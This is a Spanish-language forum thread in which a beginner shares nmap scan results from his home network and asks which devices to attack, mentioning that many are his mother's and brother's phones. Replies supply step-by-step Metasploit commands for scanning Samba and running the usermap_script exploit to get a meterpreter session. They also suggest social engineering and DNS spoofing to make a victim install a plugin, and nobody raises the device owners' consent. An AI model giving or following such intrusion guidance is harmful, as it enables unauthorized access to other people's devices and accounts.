[SOLUCIONADO] Pregunta metasploit

Iniciado por m3tr4l14, Diciembre 30, 2018, 06:30:37 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Diciembre 30, 2018, 06:30:37 PM Ultima modificación: Enero 01, 2019, 12:02:10 PM por Gabriela
Buenas Grupo, he instalado metasploit pero no se por donde empezar, le pase el nmap y me derivo estos datos:->
Código: php
nmap -sV 192.168.0.1-254
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-30 22:20 CET
Nmap scan report for 192.168.0.1
Host is up (0.0034s latency).
Not shown: 994 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   closed ssh
23/tcp   closed telnet
80/tcp   open   tcpwrapped
1900/tcp open   http       Cisco DPC3828S WiFi cable modem
8080/tcp closed http-proxy
8082/tcp open   http       Mongoose httpd
MAC Address: A4:08:F5:E0:13:8C (Sagemcom Broadband SAS)
Service Info: Device: WAP; CPE: cpe:/h:cisco:dpc3828s

Nmap scan report for 192.168.0.158
Host is up (0.0020s latency).
Not shown: 996 filtered ports
PORT     STATE  SERVICE   VERSION
443/tcp  open   ssl/http  TiVo To Go httpd 20.6.4.RC40-SAG-11:B55
1503/tcp open   websocket libwebsockets
2191/tcp open   tvbus?
9080/tcp closed glrpc
MAC Address: A0:39:EE:0D:B4:C3 (Unknown)
Service Info: Device: media device

Nmap scan report for 192.168.0.159
Host is up (0.0042s latency).
All 1000 scanned ports on 192.168.0.159 are closed
MAC Address: 80:5A:04:DC:5C:AC (LG Electronics (Mobile Communications))

Nmap scan report for 192.168.0.161
Host is up (0.0036s latency).
All 1000 scanned ports on 192.168.0.161 are closed
MAC Address: 84:B5:41:0F:37:CA (Samsung Electronics)

Nmap scan report for 192.168.0.163
Host is up (0.0025s latency).
All 1000 scanned ports on 192.168.0.163 are closed
MAC Address: 50:C8:E5:C7:DB:CD (Samsung Electronics)

Nmap scan report for 192.168.0.167
Host is up (0.0082s latency).
All 1000 scanned ports on 192.168.0.167 are closed
MAC Address: 5C:AF:06:0A:57:EF (LG Electronics (Mobile Communications))

Nmap scan report for 192.168.0.175
Host is up (0.0022s latency).
All 1000 scanned ports on 192.168.0.175 are closed
MAC Address: 7C:F9:0E:F6:5A:E5 (Samsung Electronics)

Nmap scan report for 192.168.0.178
Host is up (0.0052s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE     VERSION
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
9000/tcp open  upnp        TwonkyMedia UPnP (UPnP 1.0; pvConnect SDK 1.0; Twonky SDK 1.1)
MAC Address: A4:08:F5:E0:13:8D (Sagemcom Broadband SAS)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:2

Nmap scan report for 192.168.0.166
Host is up (0.000073s latency).
All 1000 scanned ports on 192.168.0.166 are closed

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 254 IP addresses (9 hosts up) scanned in 148.37 seconds



Cual objetivo seria interesante atacar?  la mitat son telefonos xD mi madre, brother etc...
Gracias

192.168.0.1 (el ruter supongo, ofrece servicios interesantes)

192.168.0.178 (si no me equivoco hay un exploit para el servicio samba)
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
192.168.0.1 (el ruter supongo, ofrece servicios interesantes)

192.168.0.178 (si no me equivoco hay un exploit para el servicio samba)
Gracias por responder,  que se le podria hacer al router?  La ip 178 creo que esta asignada a mi pc kali linux 😄.
Podria sacar pass admin?
Y otra pregunta, que no encuentro,  atacar a teléfonos conectados a red lan, podria?
Porque todo lo que veo en youtube es creando un payload multi handler y mandarselo y esperar a qye pique. ..

Hola necesitas un poco mas de informacion  ,

nmap -sV -sS -O -A -d2 192.168.0.1-254   // Con esto te resaltara si tienen firewall & cosas que necesitaras saber
- closed   Dispositivos sin firewall
- filtered  Dispositivos con firewall

reset ttl xxx   Es el sistema operativo  que tu exploit necesitara  , un ejemplo windows 10 da un resultado como este,  reset ttl 128
Lista de TTL  - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Cuando el resultado es este  /  All 1000 scanned ports on 192.168.0.167 are closed
Trata de utilizar -Pn Para saber el estado del dispositivo

nmap -sV -sS -O -A -d2 -Pn 192.168.xx

Una ves teniendo las  vulnerabilidades , el sistema , el estatus del firewall  ,   pasas al siguiente paso msf

msfconsole
msf>search scanner/samba 
msf>use auxiliary/scanner/smb/smb_version 
msfauxiliary(smb_version) > set RHOSTS No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
exploit
** Si carga correctamente , msf te mostrara el auxiliar cargado // (100% complete) ,  Auxiliary module execution complete.
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El exploit te abrira tu session de meterpreter  ..

Los dispositivos que tienen Firewall / IDS / Intelligence Prevention ,  Necesitaras  guias ,
Bypass Firewall Restrictions
Reverse_tcp_allports Routing - Network
Exploiting Filtered Port

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hola lo que dice @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta esta correcto y es una buena ayuda.

Pero te recomiendo que si estás practicando, te recomiendo metasploit, pero si estás llendo más haya (practicando igualmente pero con niveles de dificultad), te recomiendo que usas diferentes programas y/o mucho mejor que crees tú propia carga útil ya que así no sólo practicadas la programación ya que te volverás creativo y tendrás mas ventaja contra sistemas/programas de protección.

Si deseas atacar un dispositivo "remotamente", puedes optar por la ing. social y el dns spoofing. Insitando a que la victima tenga que instalar un plugin o algo por el estilo.

Te recomiendo metasploit así tengas conocimientos amplias para la pre explotación.
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola necesitas un poco mas de informacion  ,

nmap -sV -sS -O -A -d2 192.168.0.1-254   // Con esto te resaltara si tienen firewall & cosas que necesitaras saber
- closed   Dispositivos sin firewall
- filtered  Dispositivos con firewall

reset ttl xxx   Es el sistema operativo  que tu exploit necesitara  , un ejemplo windows 10 da un resultado como este,  reset ttl 128
Lista de TTL  - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Cuando el resultado es este  /  All 1000 scanned ports on 192.168.0.167 are closed
Trata de utilizar -Pn Para saber el estado del dispositivo

nmap -sV -sS -O -A -d2 -Pn 192.168.xx

Una ves teniendo las  vulnerabilidades , el sistema , el estatus del firewall  ,   pasas al siguiente paso msf

msfconsole
msf>search scanner/samba 
msf>use auxiliary/scanner/smb/smb_version 
msfauxiliary(smb_version) > set RHOSTS No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
exploit
** Si carga correctamente , msf te mostrara el auxiliar cargado // (100% complete) ,  Auxiliary module execution complete.
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El exploit te abrira tu session de meterpreter  ..

Los dispositivos que tienen Firewall / IDS / Intelligence Prevention ,  Necesitaras  guias ,
Bypass Firewall Restrictions
Reverse_tcp_allports Routing - Network
Exploiting Filtered Port

waoo  eres un crack 😝😝😝.  Esto serviria para los teléfonos androids conectados?  Ya que pc pocos 😂 el mio y tirando.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Hola lo que dice @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta esta correcto y es una buena ayuda.

Pero te recomiendo que si estás practicando, te recomiendo metasploit, pero si estás llendo más haya (practicando igualmente pero con niveles de dificultad), te recomiendo que usas diferentes programas y/o mucho mejor que crees tú propia carga útil ya que así no sólo practicadas la programación ya que te volverás creativo y tendrás mas ventaja contra sistemas/programas de protección.

Si deseas atacar un dispositivo "remotamente", puedes optar por la ing. social y el dns spoofing. Insitando a que la victima tenga que instalar un plugin o algo por el estilo.

Te recomiendo metasploit así tengas conocimientos amplias para la pre explotación.
jeje gracias por responder, si cuando termine de estudiar vere de ser creativo, q ahora en epoca de exámenes. ...

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Hola necesitas un poco mas de informacion  ,

nmap -sV -sS -O -A -d2 192.168.0.1-254   // Con esto te resaltara si tienen firewall & cosas que necesitaras saber
- closed   Dispositivos sin firewall
- filtered  Dispositivos con firewall

reset ttl xxx   Es el sistema operativo  que tu exploit necesitara  , un ejemplo windows 10 da un resultado como este,  reset ttl 128
Lista de TTL  - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Cuando el resultado es este  /  All 1000 scanned ports on 192.168.0.167 are closed
Trata de utilizar -Pn Para saber el estado del dispositivo

nmap -sV -sS -O -A -d2 -Pn 192.168.xx

Una ves teniendo las  vulnerabilidades , el sistema , el estatus del firewall  ,   pasas al siguiente paso msf

msfconsole
msf>search scanner/samba 
msf>use auxiliary/scanner/smb/smb_version 
msfauxiliary(smb_version) > set RHOSTS No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
exploit
** Si carga correctamente , msf te mostrara el auxiliar cargado // (100% complete) ,  Auxiliary module execution complete.
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

El exploit te abrira tu session de meterpreter  ..

Los dispositivos que tienen Firewall / IDS / Intelligence Prevention ,  Necesitaras  guias ,
Bypass Firewall Restrictions
Reverse_tcp_allports Routing - Network
Exploiting Filtered Port


Nada no me aclaro  :( ... estoy en la biblioteca  y me lanza demasiados datos 😂... filtered, no tendras algun videotutorial? Te mande un Email pd

@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Te recomiendo este vídeo:

PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF